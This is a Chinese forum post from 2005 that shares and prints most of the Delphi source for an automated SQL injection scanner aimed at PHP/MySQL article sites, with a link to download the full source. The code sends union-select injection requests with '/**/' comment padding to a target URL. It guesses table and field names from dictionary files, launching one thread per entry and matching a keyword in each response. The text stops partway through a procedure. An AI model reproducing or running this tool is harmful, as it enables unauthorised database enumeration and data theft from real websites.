简介:PHP+MYSQL网站注入扫描工具,针对类似夜猫文章下载系统比较有效,界面是仿教程的hdsi中的PHP注入模块写的,实现原理是参考angel的SQL Injection with MYSQL写的,网上有很多,不再细说。 界面截图:http://www.wrsky.com/attachment/3_1891.jpg 源码下载:http://downloads.2ccc.com/general/internet_lan/PHPInj.rar
Author: hnxyy QQ: 19026695 Date: 2005/5/25
FireFox技术交流论坛 http://www.wrsky.com It is all beginnings free It is all ruin to be privately owned 使用D7编写,界面比较难看,和教主的工具对比了一下,感觉比他的工具扫描速度要快很多
主要单元代码:
unit Unit1;
interface
uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, Spin, StdCtrls, ComCtrls, Buttons, ExtCtrls, IDHTTP, unit2, Unit3, OleCtrls, SHDocVw;
type
  { Main form of the scanner. Almost every member is a designer-placed (DFM)
    control; the procedures are their event handlers plus a few private
    helpers. Scan state lives in the private string fields below, which the
    handlers fill before starting a worker thread (the thread classes
    themselves are declared in unit2/Unit3, outside this unit). }
  TForm1 = class(TForm)
    Panel8: TPanel;
    Label15: TLabel;
    Label16: TLabel;
    Label17: TLabel;
    EdtInjUrl: TEdit;          // target URL typed by the user
    EdtKey: TEdit;             // keyword expected in a "true" response
    EdtFieldNum: TEdit;        // number of columns to enumerate
    rdbNum: TRadioButton;      // numeric-context mode (see SetUrl)
    rdbChar: TRadioButton;
    Panel1: TPanel;
    pcPHPInj: TPageControl;
    TabSheet1: TTabSheet;
    sbscan1: TSpeedButton;
    sbstop1: TSpeedButton;
    sbscan2: TSpeedButton;
    sbstop2: TSpeedButton;
    Panel15: TPanel;
    GroupBox5: TGroupBox;
    lvTable: TListView;        // table names found
    GroupBox6: TGroupBox;
    lvField: TListView;        // field names found
    TabSheet2: TTabSheet;
    GroupBox7: TGroupBox;
    Label18: TLabel;
    Label19: TLabel;
    Label20: TLabel;
    Label21: TLabel;
    spField1: TSpinEdit;
    spField2: TSpinEdit;
    EdtField1: TEdit;
    EdtField2: TEdit;
    EdtTable: TEdit;
    EdtID: TEdit;
    GroupBox8: TGroupBox;
    Label22: TLabel;
    EdtFileName: TEdit;
    sbrecord: TSpeedButton;
    sbfile: TSpeedButton;
    MM: TMemo;                 // log output
    sbscan: TSpeedButton;
    TabSheet3: TTabSheet;
    lsbDict: TListBox;         // dictionary loaded from Dict_Table.txt / Dict_Field.txt
    TabSheet4: TTabSheet;
    wb: TWebBrowser;
    spNum: TSpinEdit;
    GroupBox1: TGroupBox;
    sbscan3: TSpeedButton;
    sbstop3: TSpeedButton;
    ListBox1: TListBox;
    TabSheet5: TTabSheet;
    MMAbout: TMemo;
    StatusBar1: TStatusBar;
    procedure sbscanClick(Sender: TObject);
    procedure sbstop1Click(Sender: TObject);
    procedure sbscan1Click(Sender: TObject);
    procedure sbscan2Click(Sender: TObject);
    procedure lvFieldClick(Sender: TObject);
    procedure lvTableClick(Sender: TObject);
    procedure sbrecordClick(Sender: TObject);
    procedure sbfileClick(Sender: TObject);
    procedure sbstop2Click(Sender: TObject);
    procedure sbscan3Click(Sender: TObject);
    procedure sbstop3Click(Sender: TObject);
    procedure ListBox1Click(Sender: TObject);
    procedure FormShow(Sender: TObject);
  private
    { Private declarations }
    // Url: base URL prepared by SetUrl; KeyWord: trimmed EdtKey text, set in sbscanClick.
    Url,KeyWord:string;
    // iStr: comma-separated column list built by sbscan1Click/sbscan2Click;
    // InjUrl: last request URL assembled by InjTable.
    iStr,InjUrl:string;
    // Shows an information message box.
    procedure MsgBox(strMsg: string);
    // Fills Url from EdtInjUrl according to the selected mode radio.
    procedure SetUrl;
    // HTTP GET of URL; True when the response is 200 and (if Key is non-empty) contains Key.
    function Get(URL,Key: string): boolean;
    // Single-threaded table enumeration (the threaded path is sbscan1Click).
    procedure InjTable;
    procedure FieldThreadExit(sender: TObject);
    procedure ManagerThreadExit(sender: TObject);
  public
    { Public declarations }
    // Progress bar used by several handlers; not a DFM control, so it is
    // presumably created at run time (FormShow?) -- confirm, it is not shown here.
    pg1:TProgressBar;
  end;
var
  Form1: TForm1;
  //scanTable :array of scanTableThread; // thread array (old declaration, kept commented out)
  scanField :array of scanFieldThread;     // one worker per dictionary entry, sized in sbscan2Click
  scanManager :array of scanManagerThread;
  scanTable: scanTableThread;              // single worker that enumerates table names
  // Shared stop/finished flag: checked by InjTable's loop and by sbscan2Click.
  // NOTE(review): it is plain global state touched from the UI thread and
  // (presumably) from worker threads -- confirm how the threads use it.
  isFinish:boolean=false;
  N:integer=0;   // reset to 0 at the start of each scan; meaning beyond that is not visible here
  M:integer=0;
implementation
{$R *.dfm}
{ TForm1 }
{ Shows strMsg in a modal information box with a fixed caption.
  NOTE(review): the quote runs in the caption literal look doubled by the
  page's escaping; presumably a single-quoted literal in the original. }
procedure TForm1.MsgBox(strMsg: string);
const
  BoxCaption = ''''提示信息'''';
begin
  Application.MessageBox(PChar(strMsg), BoxCaption, MB_ICONINFORMATION);
end;
{ Prepares the Url field from the edit box: trimmed as typed when the
  numeric-mode radio is selected, otherwise with a literal single quote
  (#39) appended. }
procedure TForm1.SetUrl;
var
  base: string;
begin
  base := Trim(EdtInjUrl.Text);
  if not rdbNum.Checked then
    base := base + #39;
  Url := base;
end;
{ "Scan" button: validates the two required inputs, stores them in the
  form fields and starts a scanThread.
  NOTE(review): the thread is created with only CreateSuspended=False, so it
  presumably reads Url/KeyWord/MM from the form itself -- confirm in unit2.
  Quote runs such as '''''''' look doubled by the page's escaping;
  presumably '' (empty string) in the original. }
procedure TForm1.sbscanClick(Sender: TObject);
var
  worker: scanThread;
begin
  if EdtInjUrl.Text = '''''''' then
  begin
    MsgBox(''''请输入要注入的地址!'''');
    exit;
  end;
  if EdtKey.Text = '''''''' then
  begin
    MsgBox(''''请输入要注入的关键字!'''');
    exit;
  end;
  // Both assignments are independent of each other.
  KeyWord := Trim(EdtKey.Text);
  SetUrl;
  pg1.Visible := False;
  // Starts immediately; the local reference is not used afterwards, so the
  // thread is expected to free itself (FreeOnTerminate) -- confirm.
  worker := scanThread.Create(False);
end;
{ Fetches URL and reports whether the page "matched".
  Returns True when the response code is 200 and, if Key is non-empty, the
  body contains Key. Any exception (timeout, DNS failure, non-2xx raised by
  Indy) is swallowed and yields False, so a network error is
  indistinguishable from "keyword absent" to the caller.
  NOTE(review): the empty-string check below uses the page's doubled quote
  run ('''''''' ), presumably '' in the original -- confirm. }
function TForm1.Get(URL,Key: string): boolean;
var
  http: TIdHTTP;
  body: string;
  matched: boolean;
begin
  Result := False;
  http := TIdHTTP.Create(nil);
  try
    try
      http.HandleRedirects := True;   // redirects must be followed or the request may fail
      http.ReadTimeout := 30000;      // give up after 30 s
      body := http.Get(URL);
      matched := http.ResponseCode = 200;
      if Key <> '''''''' then
        matched := matched and (Pos(Key, body) > 0);
      Result := matched;
    except
      // best-effort: leave Result = False
    end;
  finally
    http.Free;
  end;
end;
{ "Stop" button for the first tab: hides the progress bar and raises the
  stop flag. `stoped` is not declared in this unit (presumably a global in
  unit2 polled by the worker thread -- confirm). }
procedure TForm1.sbstop1Click(Sender: TObject);
begin
  pg1.Visible := False;
  stoped := True;
end;
// Non-threaded variant of the table enumeration (sbscan1Click is the threaded one).
// For every entry of Dict_Table.txt it builds one request URL, logs it to MM,
// issues it with Get and records the entry in lvTable when the keyword matched.
// Precondition: iStr (column list) and KeyWord must already be set.
// NOTE(review): `lsbDict.Items` is used twice where an indexed entry
// (`lsbDict.Items[i]`) is clearly meant; the brackets were probably lost when
// the page was extracted -- confirm against the original source. The quote
// runs such as '''''''' likewise look doubled; presumably '' in the original.
// NOTE(review): the `/**/`-separated `and 1=1 union select ... from` query
// string is an easily recognisable request signature; it is what a WAF rule
// or access-log review would key on.
procedure TForm1.InjTable;
var
  i,j:integer;
begin
  if (iStr='''''''') or (KeyWord='''''''') then exit;
  lsbDict.Items.Clear;
  lvTable.Items.Clear;
  lsbDict.Items.LoadFromFile(ExtractFilePath(Application.ExeName)+''''Dict_Table.txt'''');
  j:=0;                       // count of matched entries, used as the row caption
  isFinish :=False;
  Screen.Cursor :=crHourGlass;
  try
    for i:=0 to lsbDict.Count-1 do
    begin
      // isFinish doubles as a stop request; nothing in this unit sets it
      // while the loop runs (sbscan2Click sets it at its end), so the
      // setter is presumably elsewhere -- confirm.
      if isFinish then break;
      InjUrl:=Url+''''/**/and/**/1=1/**/union/**/select/**/''''+iStr+ ''''/**/from/**/''''+lsbDict.Items+''''/*'''';
      MM.Lines.Add(InjUrl);
      // Get returns False on any HTTP/network error as well as on a
      // keyword miss, so transient failures silently drop entries.
      if Get(InjUrl,KeyWord) then
      begin
        inc(j);
        with lvTable.Items.Add do
        begin
          Caption :=IntToStr(j);
          SubItems.Add(lsbDict.Items);
        end;
      end;
    end;
  finally
    Screen.Cursor :=crDefault;
  end;
end;
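{ Threaded table enumeration: builds the column list "1,2,...,n" from
  EdtFieldNum, loads Dict_Table.txt into lsbDict and hands the work to a
  single scanTableThread.
  Preconditions: KeyWord must have been set (sbscanClick); EdtFieldNum must
  parse as an integer (StrToInt raises EConvertError otherwise, as before).
  Fix: iStr is a form field and was never reset here, so every click
  appended another "1,2,...,n" run to the previous list (sbscan2Click does
  reset it; this handler now does too).
  NOTE(review): quote runs such as '''''''' look doubled by the page's
  escaping; presumably '' (empty string) in the original -- confirm. }
procedure TForm1.sbscan1Click(Sender: TObject);
var
  i, fieldCount: integer;
begin
  fieldCount := StrToInt(EdtFieldNum.Text);   // parsed once instead of twice
  if (fieldCount <= 0) or (KeyWord = '''''''') then exit;
  lsbDict.Items.Clear;
  lvTable.Items.Clear;
  N := 0;
  lsbDict.Items.LoadFromFile(ExtractFilePath(Application.ExeName) + ''''Dict_Table.txt'''');
  isFinish := False;
  iStr := '';                                   // start from an empty list every time
  for i := 1 to fieldCount do
    iStr := iStr + '''','''' + IntToStr(i);
  iStr := Copy(iStr, 2, Length(iStr) - 1);      // drop the leading separator
  // All table guessing happens in this one thread.
  scanTable := scanTableThread.Create(Url, iStr, KeyWord, MM, lvTable);
end;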
{ Field enumeration for the table selected in lvTable. The handler has two
  phases keyed on the global isFinish flag:
    - isFinish = False: load Dict_Field.txt, build the column list with the
      placeholder "&FIELDNAME&" at position spNum, and start one
      scanFieldThread per dictionary entry (each with FieldThreadExit as its
      OnTerminate handler).
    - isFinish = True: tear down any threads from index N onward, then log
      completion.
  It always leaves isFinish = True, so the first click starts the scan and
  the next click runs the teardown branch.
  NOTE(review): the placeholder "&FIELDNAME&" is presumably replaced by each
  scanFieldThread with its own dictionary entry -- confirm in unit2/Unit3.
  NOTE(review): quote runs such as '''''''' look doubled by the page's
  escaping; presumably '' in the original -- confirm. }
procedure TForm1.sbscan2Click(Sender: TObject);
var
  i,j,Sum:integer;
  tablename:string;
begin
  if lvTable.Items.Count<=0 then exit;
  if lvTable.SelCount<=0 then
  begin
    MsgBox(''''请选择一个表名!'''');
    exit;
  end;
  tablename :=trim(lvTable.Selected.SubItems.GetText);
  if tablename='''''''' then exit;
  if isFinish=False then
  begin
    lsbDict.Items.Clear;
    lvField.Items.Clear;
    MM.Clear;
    N :=0;
    lsbDict.Items.LoadFromFile(ExtractFilePath(Application.ExeName)+''''Dict_Field.txt'''');
    Sum :=lsbDict.Count;
    iStr :='''''''';
    pg1.Min :=0;
    pg1.Max :=sum;
    pg1.Step :=1;
    pg1.Position :=0;
    pg1.Visible :=true;
    MM.Lines.Add(''''开始猜解字段。。。'''');
    MM.Lines.Add('''''''');
    // Column list: "1,2,...,n" with the chosen position replaced by the placeholder.
    // Both spin/edit values are parsed on every iteration; non-numeric text raises here.
    for i:=1 to strtoint(EdtFieldNum.Text) do
    begin
      if i=strtoint(spNum.Text) then
        iStr :=iStr+'''',&FIELDNAME&''''
      else
        iStr :=iStr+'''',''''+inttostr(i);
    end;
    if iStr<>'''''''' then iStr :=copy(iStr,2,length(iStr)-1);   // drop the leading separator
    SetLength(scanField,Sum); // size the thread array to the dictionary length
    // One thread per dictionary entry -- with a large dictionary this starts
    // that many concurrent requests against the target; nothing caps it.
    for j:=0 to Sum-1 do
    begin
      //if isFinish then exit;
      scanField[j] := scanFieldThread.Create(Url,iStr,KeyWord,tablename,j,MM,lvField);
      scanField[j].OnTerminate := FieldThreadExit;
    end;
    // sbscan2.Caption :=''''停止'''';
  end;
  try
    if isFinish=true then
    begin
      //if N>=lsbDict.Count then exit;
      // The caption assignment above is commented out, so unless the caption
      // is set elsewhere this teardown branch never runs -- confirm.
      if sbscan2.Caption=''''停止'''' then
      begin
        for j:=N to lsbDict.Count-1 do
        begin
          // NOTE(review): Suspend followed by Free on a live thread is
          // unsafe (the thread may hold locks or be mid-callback); a
          // Terminate/WaitFor sequence is the usual shape -- review before reuse.
          if scanField[j].FreeOnTerminate then
          begin
            scanField[j].Suspend;
            scanField[j].Free;
            //scanField[j].Terminate;
          end;
        end;
      end;
      MM.Lines.Add('''''''');
      MM.Lines.Add(''''字段猜解结束。。。'''');
      // sbscan2.Caption :=''''猜解'''';
    end;
  except
    // any error during teardown is silently dropped
  end;
  isFinish :=true;
end;
procedure TForm1.Fiel